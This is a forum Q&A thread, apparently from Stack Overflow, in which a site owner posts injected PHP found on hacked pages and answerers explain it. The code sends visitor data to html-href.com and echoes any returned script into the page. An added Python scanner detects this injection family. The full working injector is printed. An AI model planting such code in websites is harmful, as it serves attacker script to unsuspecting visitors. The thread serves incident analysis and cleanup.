
Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.

<?php
#31e3cd#
// Silence all PHP errors so the injection never shows up in page output
error_reporting(0); ini_set('display_errors',0);
$wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
// Only act for Gecko/MSIE user agents, and skip anything whose UA mentions "bot"
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
    // Callback URL built from concatenated fragments: http://html-href.com/href/?ip=...&referer=...&ua=...
    $wp_okpbo0935639 = "http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
    // Fetch whatever the remote server returns for this visitor (6 second timeout)
    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL, $wp_okpbo0935639);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 6);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_35639okpbo = curl_exec ($ch);
    curl_close($ch);
}
// Print the fetched content into the page only if characters 2-4 are "scr" (i.e. it begins with a <script> tag)
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>

Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:

$_SERVER['HTTP_USER_AGENT']

It is then combined into a URL similar to the one below, but with the user information from above added to the URL.

http://html-href.com/href/?ip=::1&referer=localhost&ua=

I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?


2 Answers


The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's user-agent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.

It appears to target Internet Explorer, Chrome, and Firefox browsers, but not crawlers/bots.

EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.

    It's likely to be JS, since it's checking for substring of `scr` as the 2nd 3rd and 4th characters (which would match ` – naththedeveloper Jan 07 '14 at 15:19
  • Good call. I hadn't thought of 'script' (I'm terrible at word games!). As a result it appears to only be printing the resulting string if it's JavaScript. – Crashspeeder Jan 07 '14 at 15:21
  • Is the returned content likely to cause damage to a user's machine? Is it just returning a string or could the returned content be executed, perhaps to exploit a vulnerability in one of these browsers? – Tom smith Jan 07 '14 at 15:24
  • The returned content is likely to be an exploit targeted at Firefox or Internet Explorer. The string returned is only printed if it contains a ` – Crashspeeder Jan 07 '14 at 15:27
  • @RobertRozas you're right. Chrome's UA string contains "Like Gecko" in it. – Crashspeeder Jan 07 '14 at 15:29
  • Thanks for the replies, I think I have a better idea of what this code is doing now. We have the IP address of the user who accessed the site via FTP, it's a location in Spain but I don't know if there is anything we can do with this information. – Tom smith Jan 07 '14 at 15:59
  • The best thing you can do is look into ways to better secure your server (maybe post on ServerFault?). It's my understanding that FTP is insecure and SFTP/SCP are better alternatives. No need to thank us. The best way you can show gratitude is by voting for questions/answers on SO and accepting the best answer to your questions. – Crashspeeder Jan 07 '14 at 16:02
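As an added example (not from the question or either answer), a small Python scanner for cleaning up a compromised web root: it locates this injection family by its hex-tag comment markers, folds the concatenated string fragments so the real callback host is readable, and reports which behavioural markers (user-agent gate, bot filter, cURL fetch, the 'scr' check, and the echo) are present. The tag format and indicator patterns are assumptions inferred from the single sample in the question, so treat them as a heuristic for this family rather than a general signature; `scan_tree` is a hypothetical helper.

```python
import re
from pathlib import Path

# Constructed sample: the injected block quoted in the question, embedded so the scanner runs offline.
SAMPLE_PHP = r'''<?php #31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo =   curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd# ?>'''

# The injection brackets itself with paired hex-tag comments #xxxxxx# ... #/xxxxxx# (assumption from this one sample)
BLOCK_RE = re.compile(r'#(?P<tag>[0-9a-f]{6})#(?P<body>.*?)#/(?P=tag)#', re.S)
# A run of double-quoted literals glued together with '.', e.g. "http://"."html"."-href"
LITERAL_RUN_RE = re.compile(r'"[^"]*"(?:\s*\.\s*"[^"]*")+')
URL_RE = re.compile(r'"(https?://[^"]+)"')
# Behavioural markers of the sample, checked after de-obfuscation.
INDICATORS = {
    'ua_gate':      re.compile(r"preg_match\s*\(\s*'/Gecko\|MSIE/i'"),
    'bot_filter':   re.compile(r"!preg_match\s*\(\s*'/bot/i'"),
    'remote_fetch': re.compile(r'curl_exec\s*\('),
    'script_gate':  re.compile(r"substr\s*\(\s*\$\w+\s*,\s*1\s*,\s*3\s*\)\s*===\s*'scr'"),
    'echo_fetched': re.compile(r'echo\s+\$\w+'),
}

def fold_concat(php: str) -> str:
    """Join adjacent string literals so the real callback host becomes readable."""
    def join(m):
        return '"' + ''.join(re.findall(r'"([^"]*)"', m.group(0))) + '"'
    return LITERAL_RUN_RE.sub(join, php)

def scan_source(php: str) -> list:
    """One finding per tagged block: its tag, the indicators matched, and any callback URLs."""
    findings = []
    for m in BLOCK_RE.finditer(php):
        body = fold_concat(m.group('body'))
        findings.append({
            'tag': m.group('tag'),
            'indicators': [name for name, rx in INDICATORS.items() if rx.search(body)],
            'urls': URL_RE.findall(body),
        })
    return findings

def scan_tree(root: str) -> dict:
    """Hypothetical helper: every .php file under root that has at least one finding."""
    return {str(p): f for p in Path(root).rglob('*.php')
            if (f := scan_source(p.read_text(errors='replace')))}
```

Running `scan_source(SAMPLE_PHP)` reports tag `31e3cd`, all five indicators, and the folded callback prefix `http://html-href.com/href/?ip=`, which answers the "where is this being sent" question directly from the source.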

$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox (Gecko) or IE (MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.